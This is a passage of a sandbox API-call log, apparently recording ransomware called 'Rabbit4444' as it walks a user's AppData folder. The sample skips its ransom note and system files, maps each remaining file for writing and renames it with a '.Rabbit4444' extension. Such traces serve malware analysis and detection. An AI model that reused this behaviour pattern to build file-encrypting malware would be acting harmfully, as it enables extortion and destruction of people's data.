4USG.m4a", lpString2="bootmgr") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="pagefile.sys") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="boot") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="ids.txt") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="NTUSER.DAT") returned 1 [0050.481] lstrcpyW (in: lpString1=0x130eb78, lpString2="shbgybF2YTr 4USG.m4a" | out: lpString1="shbgybF2YTr 4USG.m4a") returned="shbgybF2YTr 4USG.m4a" [0050.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\shbgybF2YTr 4USG.m4a", dwFileAttributes=0x0) returned 1 [0050.481] lstrlenW (lpString="shbgybF2YTr 4USG.m4a") returned 20 [0050.481] lstrlenW (lpString="Rabbit4444") returned 10 [0050.481] lstrcmpiW (lpString1="r 4USG.m4a", lpString2="Rabbit4444") returned -1 [0050.481] lstrlenW (lpString=".dll") returned 4 [0050.481] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.481] lstrlenW (lpString=".lnk") returned 4 [0050.481] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.481] lstrlenW (lpString=".ini") returned 4 [0050.481] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.481] lstrlenW (lpString=".sys") returned 4 [0050.481] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\shbgybF2YTr 4USG.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\shbgybf2ytr 4usg.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.482] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.482] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14179242719) returned 1 [0050.482] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83550) returned 1 [0050.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.482] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14960, lpName=0x0) returned 0x298 [0050.482] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14960) returned 0x70000 [0050.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.485] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14179539010) returned 1 [0050.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.485] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.486] CloseHandle (hObject=0x298) returned 1 [0050.486] CloseHandle (hObject=0x278) returned 1 [0050.486] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\shbgybF2YTr 4USG.m4a.Rabbit4444") returned 63 [0050.486] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\shbgybF2YTr 4USG.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\shbgybf2ytr 4usg.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\shbgybF2YTr 4USG.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\shbgybf2ytr 4usg.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.487] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20bcea90, ftCreationTime.dwHighDateTime=0x1d4c7a5, ftLastAccessTime.dwLowDateTime=0x8f521440, ftLastAccessTime.dwHighDateTime=0x1d4c727, ftLastWriteTime.dwLowDateTime=0x8f521440, ftLastWriteTime.dwHighDateTime=0x1d4c727, nFileSizeHigh=0x0, nFileSizeLow=0x13540, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIxZckh.mp3", cAlternateFileName="")) returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="Rabbit4444.exe") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2=".") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="..") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="windows") returned -1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="bootmgr") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="pagefile.sys") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="boot") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="ids.txt") returned 1 [0050.487] lstrcmpiW (lpString1="SIxZckh.mp3", lpString2="NTUSER.DAT") returned 1 [0050.487] lstrcpyW (in: lpString1=0x130eb78, lpString2="SIxZckh.mp3" | out: lpString1="SIxZckh.mp3") returned="SIxZckh.mp3" [0050.487] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SIxZckh.mp3", dwFileAttributes=0x0) returned 1 [0050.487] lstrlenW (lpString="SIxZckh.mp3") returned 11 [0050.487] lstrlenW (lpString="Rabbit4444") returned 10 [0050.487] lstrcmpiW (lpString1="IxZckh.mp3", lpString2="Rabbit4444") returned -1 [0050.487] lstrlenW (lpString=".dll") returned 4 [0050.487] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.487] lstrlenW (lpString=".lnk") returned 4 [0050.487] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.487] lstrlenW (lpString=".ini") returned 4 [0050.487] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.487] lstrlenW (lpString=".sys") returned 4 [0050.487] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SIxZckh.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sixzckh.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.488] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.488] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14179844972) returned 1 [0050.488] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=79168) returned 1 [0050.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0050.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0050.488] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13840, lpName=0x0) returned 0x298 [0050.488] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13840) returned 0x70000 [0050.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14180109006) returned 1 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0050.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0050.490] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.491] CloseHandle (hObject=0x298) returned 1 [0050.491] CloseHandle (hObject=0x278) returned 1 [0050.492] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SIxZckh.mp3.Rabbit4444") returned 54 [0050.492] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SIxZckh.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sixzckh.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SIxZckh.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sixzckh.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.504] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="Rabbit4444.exe") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2=".") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="..") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="windows") returned -1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="bootmgr") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="pagefile.sys") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="boot") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="ids.txt") returned 1 [0050.504] lstrcmpiW (lpString1="Skype", lpString2="NTUSER.DAT") returned 1 [0050.505] lstrcpyW (in: lpString1=0x130eb78, lpString2="Skype" | out: lpString1="Skype") returned="Skype" [0050.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0050.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4c) returned 0xf1448 [0050.505] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0050.505] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d51cbe0, ftCreationTime.dwHighDateTime=0x1d4d318, ftLastAccessTime.dwLowDateTime=0xbc995b20, ftLastAccessTime.dwHighDateTime=0x1d4cbf5, ftLastWriteTime.dwLowDateTime=0xbc995b20, ftLastWriteTime.dwHighDateTime=0x1d4cbf5, nFileSizeHigh=0x0, nFileSizeLow=0x18f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SU1bhi PYyXL.m4a", cAlternateFileName="SU1BHI~1.M4A")) returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2=".") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="..") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="windows") returned -1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="bootmgr") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="pagefile.sys") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="boot") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="ids.txt") returned 1 [0050.505] lstrcmpiW (lpString1="SU1bhi PYyXL.m4a", lpString2="NTUSER.DAT") returned 1 [0050.505] lstrcpyW (in: lpString1=0x130eb78, lpString2="SU1bhi PYyXL.m4a" | out: lpString1="SU1bhi PYyXL.m4a") returned="SU1bhi PYyXL.m4a" [0050.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SU1bhi PYyXL.m4a", dwFileAttributes=0x0) returned 1 [0050.505] lstrlenW (lpString="SU1bhi PYyXL.m4a") returned 16 [0050.505] lstrlenW (lpString="Rabbit4444") returned 10 [0050.505] lstrcmpiW (lpString1=" PYyXL.m4a", lpString2="Rabbit4444") returned -1 [0050.505] lstrlenW (lpString=".dll") returned 4 [0050.505] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.505] lstrlenW (lpString=".lnk") returned 4 [0050.505] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.505] lstrlenW (lpString=".ini") returned 4 [0050.505] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.505] lstrlenW (lpString=".sys") returned 4 [0050.505] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SU1bhi PYyXL.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\su1bhi pyyxl.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.506] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.506] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14181778526) returned 1 [0050.507] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6391) returned 1 [0050.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0050.507] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c00, lpName=0x0) returned 0x298 [0050.507] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c00) returned 0x70000 [0050.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.508] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14181907141) returned 1 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0050.508] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.509] CloseHandle (hObject=0x298) returned 1 [0050.509] CloseHandle (hObject=0x278) returned 1 [0050.509] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SU1bhi PYyXL.m4a.Rabbit4444") returned 59 [0050.509] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SU1bhi PYyXL.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\su1bhi pyyxl.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SU1bhi PYyXL.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\su1bhi pyyxl.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.510] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="Rabbit4444.exe") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2=".") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="..") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="windows") returned -1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="bootmgr") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="pagefile.sys") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="boot") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="ids.txt") returned 1 [0050.510] lstrcmpiW (lpString1="Sun", lpString2="NTUSER.DAT") returned 1 [0050.510] lstrcpyW (in: lpString1=0x130eb78, lpString2="Sun" | out: lpString1="Sun") returned="Sun" [0050.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0050.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b6a0 [0050.510] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0050.510] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36a1f90, ftCreationTime.dwHighDateTime=0x1d4cf88, ftLastAccessTime.dwLowDateTime=0x4e8d9f50, ftLastAccessTime.dwHighDateTime=0x1d4cd7c, ftLastWriteTime.dwLowDateTime=0x4e8d9f50, ftLastWriteTime.dwHighDateTime=0x1d4cd7c, nFileSizeHigh=0x0, nFileSizeLow=0x517d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u2g_PYJZ.bmp", cAlternateFileName="")) returned 1 [0050.510] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.510] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="Rabbit4444.exe") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2=".") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="..") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="windows") returned -1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="bootmgr") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="pagefile.sys") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="boot") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="ids.txt") returned 1 [0050.511] lstrcmpiW (lpString1="u2g_PYJZ.bmp", lpString2="NTUSER.DAT") returned 1 [0050.511] lstrcpyW (in: lpString1=0x130eb78, lpString2="u2g_PYJZ.bmp" | out: lpString1="u2g_PYJZ.bmp") returned="u2g_PYJZ.bmp" [0050.511] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\u2g_PYJZ.bmp", dwFileAttributes=0x0) returned 1 [0050.511] lstrlenW (lpString="u2g_PYJZ.bmp") returned 12 [0050.511] lstrlenW (lpString="Rabbit4444") returned 10 [0050.511] lstrcmpiW (lpString1="g_PYJZ.bmp", lpString2="Rabbit4444") returned -1 [0050.511] lstrlenW (lpString=".dll") returned 4 [0050.511] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.511] lstrlenW (lpString=".lnk") returned 4 [0050.511] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.511] lstrlenW (lpString=".ini") returned 4 [0050.511] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.511] lstrlenW (lpString=".sys") returned 4 [0050.511] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.511] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\u2g_PYJZ.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u2g_pyjz.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.511] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.511] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14182220118) returned 1 [0050.511] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20861) returned 1 [0050.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0050.512] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5480, lpName=0x0) returned 0x298 [0050.512] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5480) returned 0x70000 [0050.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.513] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14182371622) returned 1 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0050.513] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.513] CloseHandle (hObject=0x298) returned 1 [0050.513] CloseHandle (hObject=0x278) returned 1 [0050.517] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\u2g_PYJZ.bmp.Rabbit4444") returned 55 [0050.517] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\u2g_PYJZ.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u2g_pyjz.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\u2g_PYJZ.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u2g_pyjz.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.517] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37ba1490, ftCreationTime.dwHighDateTime=0x1d4d0ef, ftLastAccessTime.dwLowDateTime=0x94ea56f0, ftLastAccessTime.dwHighDateTime=0x1d4c59d, ftLastWriteTime.dwLowDateTime=0x94ea56f0, ftLastWriteTime.dwHighDateTime=0x1d4c59d, nFileSizeHigh=0x0, nFileSizeLow=0xdb1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uK 4SUFJ.flv", cAlternateFileName="UK4SUF~1.FLV")) returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="Rabbit4444.exe") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2=".") returned 1 [0050.517] lstrcmpiW (lpString1="uK 